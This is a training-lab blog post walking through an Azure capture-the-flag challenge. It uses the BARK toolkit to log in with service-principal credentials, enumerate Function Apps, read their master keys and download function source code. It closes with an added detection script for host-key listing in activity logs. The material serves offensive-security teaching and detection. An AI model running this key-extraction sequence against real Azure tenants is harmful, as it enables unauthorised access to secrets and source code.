Calling One RESTful API at a time using BARK Tool (Update to Red Labs Platform)
- Hitesh Duseja
Hello Readers,
Today, we are going to discuss the launch of a new category of labs on our very own community-favorite Red Labs platform, with a focus on using the BARK tool.
So, without further ado, let’s get started with it.
The first question we must address is this: What exactly is BARK?
BARK stands for BloodHound Attack Research Kit. It is authored by Andy Robbins of SpecterOps, who is also one of the creators of the famous BloodHound tool for Active Directory pen testing. The UVP of BARK is that it is a standalone PowerShell script that can be used to interact with various Azure services. BARK's design is very modular: almost all of its functions are self-contained, since they are nothing but wrappers around REST API calls to Azure endpoints, which makes the tool easy to maintain.
With the basics clear, let’s steer the blog post discussion towards the new labs.
In all 10 new labs, the aim is to attack multiple services in Azure using BARK. In a few labs, we also encourage our users to use PowerShell's Invoke-RestMethod to make native (raw) API calls to the Azure endpoints for enumeration purposes. With this, we try to make the lab experience more coherent and helpful for our community in learning offensive Azure tactics.
Now, with all this background, let’s solve one of the labs. The reader is free to follow along.
Please log in to https://redlabs.enterprisesecurity.io and use the search bar to find "Function App" or "BARK".


Find Challenge 7. The challenge asks for the flag from the Function App source code via the Service Principal login.
What is a Function App? An Azure Function App is a serverless compute service in Azure that hosts one or more individual functions: small, event-driven code units that run reactively when an event occurs or a condition is satisfied. Supported languages include C#, Python, PowerShell, JavaScript, and Java.
Fire up the lab and wait for your credentials.
Download the BARK script from GitHub by cloning the BARK repository. Navigate to the BARK directory, where the BARK.ps1 script is located. Import the BARK script into the current PowerShell session so you can access its functions.
git clone https://github.com/BloodHoundAD/BARK
Import-Module "$pwd\BARK\BARK.ps1"
Note: If git is not installed on the system, the user can follow the steps below to download, extract and import BARK into the current PowerShell session.
$presentworkingdirectory = pwd
$presentworkingdirectory
$downloadfile = Join-Path $presentworkingdirectory "BARK.zip"
$downloadfile
Invoke-WebRequest -UseBasicParsing -Uri 'https://github.com/BloodHoundAD/BARK/archive/refs/heads/main.zip' -OutFile $downloadfile
Expand-Archive $downloadfile -DestinationPath $presentworkingdirectory
$ps1path = Join-Path $presentworkingdirectory "BARK-main\BARK.ps1"
$ps1path
Import-Module $ps1path
In PowerShell, assign the provided credentials to variables.
$tenantdomain = '<AZUREENTRADOMAIN.COM>'
$clientid = '<CLIENTID>'
$clientsecret = '<CLIENTPASSWORD>'
Using BARK, get the ARM Token via the Service Principal credentials.
$atok = (Get-AzureRMTokenWithClientCredentials -ClientID $clientid -ClientSecret $clientsecret -TenantName $tenantdomain)."access_token"
$subs = (Get-AllAzureRMSubscriptions -Token $atok)."subscriptionId"
As the challenge title hints at Function App, let’s enumerate the required details.
$allfunctionapp = Get-AllAzureRMFunctionApps -Token $atok -SubscriptionID $subs
$allfunctionapp
$functionappid = 'https://management.azure.com' + $allfunctionapp.id
$functionappid
Then, as per the given challenge scenario, let's get the download path of the Function App function's source code file.
$functionappfuncs = Get-AzureFunctionAppFunctions -Token $atok -PathToFunctionApp $functionappid
$functionappfuncs
$functionappfuncs.properties.script_href
To download the source code file, we need the master key of the Function App, so let's get that to download the function.
$functionappmkey = Get-AzureFunctionAppMasterKeys -Token $atok -PathToFunctionApp $functionappid
$pwd = pwd
$headers = @{
    "x-functions-key" = $functionappmkey
}
It’s time to use Sysinternals strings64.exe to find the flag in the downloaded source code.
$presentworkingdirectory = pwd
$presentworkingdirectory
[System.IO.File]::WriteAllBytes("$presentworkingdirectory\<FUNCTION_NAME_FILE.EXTENSION>",(Invoke-WebRequest -Headers $headers $functionappfuncs.properties.script_href).Content)
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Strings.zip" -OutFile "Strings.zip"
Expand-Archive "Strings.zip" -DestinationPath $presentworkingdirectory -Force
$stringsfile = Join-Path -Path $presentworkingdirectory -ChildPath "strings.exe"
$flagsearch = Invoke-Expression "$stringsfile -accepteula <FUNCTION_NAME_FILE.EXTENSION>"
$flagsearch | Select-String -Pattern "flag"
Submit the flag and complete the challenge.
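Seen from the defender's side, the master-key read in this walkthrough is a management-plane request. The following is an added example (not part of the original lab or of BARK) that flags such reads in Activity Log records, assuming they are recorded as the Microsoft.Web/sites/host/listkeys/action operation; the flattened field names, the Find-HostKeyListing function and the sample events are constructed for illustration.

```powershell
# Constructed sample events (not real log data). The flattened field names
# are an assumption; map them from the Activity Log export you actually use.
$sampleJson = @'
[
 {"time":"2024-05-01T10:00:05Z","operationName":"MICROSOFT.WEB/SITES/HOST/LISTKEYS/ACTION","resultType":"Success",
  "caller":"11111111-1111-1111-1111-111111111111","callerIpAddress":"203.0.113.10",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo/providers/Microsoft.Web/sites/func-demo"},
 {"time":"2024-05-01T10:02:41Z","operationName":"Microsoft.Web/sites/host/listkeys/action","resultType":"Success",
  "caller":"deploy@example.com","callerIpAddress":"198.51.100.7",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo/providers/Microsoft.Web/sites/func-demo"},
 {"time":"2024-05-01T10:03:00Z","operationName":"Microsoft.Web/sites/write","resultType":"Success",
  "caller":"deploy@example.com","callerIpAddress":"198.51.100.7",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo/providers/Microsoft.Web/sites/func-demo"}
]
'@

function Find-HostKeyListing {
    param(
        [Parameter(Mandatory)][object[]]$Records,
        [string[]]$ExpectedCallers = @()   # identities that legitimately read host keys
    )
    $op   = '^Microsoft\.Web/sites/host/listkeys/action$'   # -match ignores case
    $guid = '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'
    $Records |
        Where-Object { $_.operationName -match $op -and $_.resultType -eq 'Success' } |
        Where-Object { $_.caller -notin $ExpectedCallers } |
        Group-Object caller, resourceId |
        ForEach-Object {
            $first = $_.Group | Sort-Object time | Select-Object -First 1
            [pscustomobject]@{
                Caller      = $first.caller
                # Heuristic: a GUID caller is an application identity, not a user name
                LooksLikeSP = [bool]($first.caller -match $guid)
                FunctionApp = ($first.resourceId -split '/')[-1]
                SourceIPs   = @($_.Group.callerIpAddress | Sort-Object -Unique) -join ','
                Events      = $_.Count
                FirstSeen   = $first.time
            }
        }
}

$records = $sampleJson | ConvertFrom-Json
Find-HostKeyListing -Records $records -ExpectedCallers 'deploy@example.com' | Format-List
```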
Hooray, we have successfully solved Challenge 7. Want to try the challenge? Please log on to https://redlabs.enterprisesecurity.io/ and enjoy the lab.
Thank you for reading !! Cheers !!
Posted by:
Hitesh Duseja
Security Researcher at AlteredSecurity




